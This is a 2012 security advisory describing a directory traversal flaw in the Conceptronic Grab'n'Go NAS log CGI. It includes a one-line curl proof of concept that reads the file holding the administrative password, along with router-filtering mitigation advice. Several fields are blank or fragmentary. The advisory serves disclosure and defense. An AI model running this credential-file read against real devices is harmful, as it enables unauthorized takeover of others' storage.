Security Advisory AA-003: Directory Traversal Vulnerability in Conceptronic Grab’n’Go Network Storage
Severity Rating: High
Discovery Date: July 29, 2012
Vendor Notification: July 30, 2012
Disclosure Date: September 3, 2012
Vulnerability Type=
Directory Traversal
Impact=
Severity=
Alcyon rates the severity of this vulnerability as high due to the following properties:
Products and firmware versions affected=
Risk Assessment=
An attacker can read arbitrary files, including the files that stores the administrative password.
This means an attacer could:
Vulnerability=
The CGI-script that is responsible for showing the device logs is affected by a directory traversal vulnerability that
allows an attacker to view arbitrary files.
Proof of Concept Exploit=
curl "http://<victimIP>/cgi-bin/log.cgi?syslog&…/…/etc/sysconfig/config/webmaster.conf&Conceptronic2009"
Risk Mitigation=
At the time of disclosure no updated firmware version was available.
We recommend that you limit access to the devices's web management UI by utilizing proper packet filtering and/or NAT
on your router in order to limit network access to your NAS. Although this will not completely eliminate the risk of
exploitation, it becomes substantially more difficult to leverage a successful attack, because it would involve either
a compromise of another host on the victim’s local network or a client side attack that overcomes the Same Origin
Policy restrictions of the victim’s web browser.
Vendor Response=
process
issue on a CH3HNAS
are working on a fix
Fixed Versions=
=Latest version of this advisory
http://www.alcyon.nl/advisories/aa-003/